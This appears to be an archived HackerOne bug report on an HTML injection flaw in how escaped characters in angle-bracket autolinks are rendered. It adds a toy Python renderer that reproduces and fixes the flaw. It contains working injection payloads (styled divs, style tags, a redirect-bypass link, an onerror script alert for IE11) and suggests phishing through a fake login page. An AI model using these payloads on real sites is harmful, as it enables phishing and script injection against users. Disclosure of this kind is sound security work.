HackerOne: Vulnerability with the way \ escaped characters in <http://danlec.com> style links are rendered

2015-02-01T23:52:18
ID H1:46072
Type hackerone
Reporter danlec
Modified 2015-02-03T17:34:45

Description

> <http://\<div\ style=\"font-size:24px;background:red;color:white;width:100%;height:48px;line-height:48px;text-align:center;\"\>Uh\ oh!</div\>>

Basic POC:

Sequences like `<http://\<h1\>test\</h1\>>` are rendered as `http://<h1>test</h1>`
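To make the defect concrete, here is an added toy renderer (not HackerOne's code or the reporter's): it assumes the markdown engine processes backslash escapes inside `<...>` autolinks and then splices the unescaped URL into the output without HTML-escaping it; the `fixed=True` path applies the minimal correction of escaping the URL after unescaping, so the report's PoC comes out as inert text.

```python
import html


def scan_autolink(text, start):
    """Return (url, end) for an autolink opening at text[start] == '<', else None.

    Constructed approximation of the behaviour the report describes: inside
    the angle brackets a backslash escapes any single character, including
    '>' and space, so the closing '>' can be deferred past injected markup.
    """
    if not (text.startswith("<http://", start) or text.startswith("<https://", start)):
        return None
    body, i = [], start + 1
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):  # backslash escape: keep next char literally
            body.append(text[i + 1])
            i += 2
            continue
        if ch == ">":
            return "".join(body), i + 1
        body.append(ch)
        i += 1
    return None  # no closing '>': not an autolink


def render(text, fixed):
    """Render markdown-style autolinks to HTML.

    fixed=False reproduces the defect: the unescaped URL is spliced into the
    output raw, so escaped markup inside <...> becomes live HTML.
    fixed=True HTML-escapes the URL (in both href and link text) after
    unescaping; the surrounding text is escaped in both modes.
    """
    out, i = [], 0
    while i < len(text):
        hit = scan_autolink(text, i) if text[i] == "<" else None
        if hit is None:
            out.append(html.escape(text[i]))
            i += 1
            continue
        url, i = hit
        shown = html.escape(url, quote=True) if fixed else url
        out.append('<a href="%s">%s</a>' % (shown, shown))
    return "".join(out)


if __name__ == "__main__":
    payload = "<http://\\<h1\\>test\\</h1\\>>"  # constructed from the report's basic PoC
    print(render(payload, fixed=False))  # live <h1> in the output
    print(render(payload, fixed=True))   # &lt;h1&gt; text only
```

A stricter fix is the CommonMark behaviour of not processing backslash escapes inside autolinks at all, so a `\>` simply ends the link; escaping the output is still required either way.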

Examples of what could be done with this:

Obviously there's a whole variety of stuff that can be done when you can inject arbitrary HTML, even in spite of the CSP protection.

We can put in elements we're not supposed to (see above, where we've inserted an attention-grabbing div)

We can put in "arbitrary" images (i.e. profile pictures)

`<http://\<img\ src=\"https://profile-photos.hackerone-user-content.com/production/000/000/013/76b3a9e70495c3b7340e33cdf5141660ae26489b_large.png?1383694562\"\>`

> <http://\<img\ src=\"https://profile-photos.hackerone-user-content.com/production/000/000/013/76b3a9e70495c3b7340e33cdf5141660ae26489b_large.png?1383694562\"\>>

We can put in our own `<style>` tags, e.g. using

`<http://\<style\>.markdownable\ blockquote{color:white;border:0;padding:0;margin:0;}a{color:red !important}\</style\>>`

> <http://\<style\>.markdownable\ blockquote{color:white;border:0;padding:0;margin:0;}a{color:red\ !important}\</style\>>

Serious Exploits

We can bypass HackerOne's link /redirect:

`<http://\<a\ href=\"http://danlec.com\"\>Redirect\ bypassed\</a\>>`

If we wanted to be particularly sneaky, we could use CSS to make a link cover the whole submission, so clicking anywhere would activate the link … which might allow us to do some phishing by having the link go to a fake HackerOne login screen.

> <http://\<a\ href=\"http://danlec.com\"\>Redirect\ bypassed\</a\>>

For browsers without good CSP support, like IE11, we can use this to run script on a victim when they try to view our submission using

`<http://\<img\ style=\"display:none\"\ src=0\ onerror=\"alert(\'Uh\ oh\')\"\>>`

> <http://\<img\ style=\"display:none\"\ src=0\ onerror=\"alert(\'Uh\ oh\')\"\>>

(If you're using IE11 for some reason, you'll get an alert when you view this submission)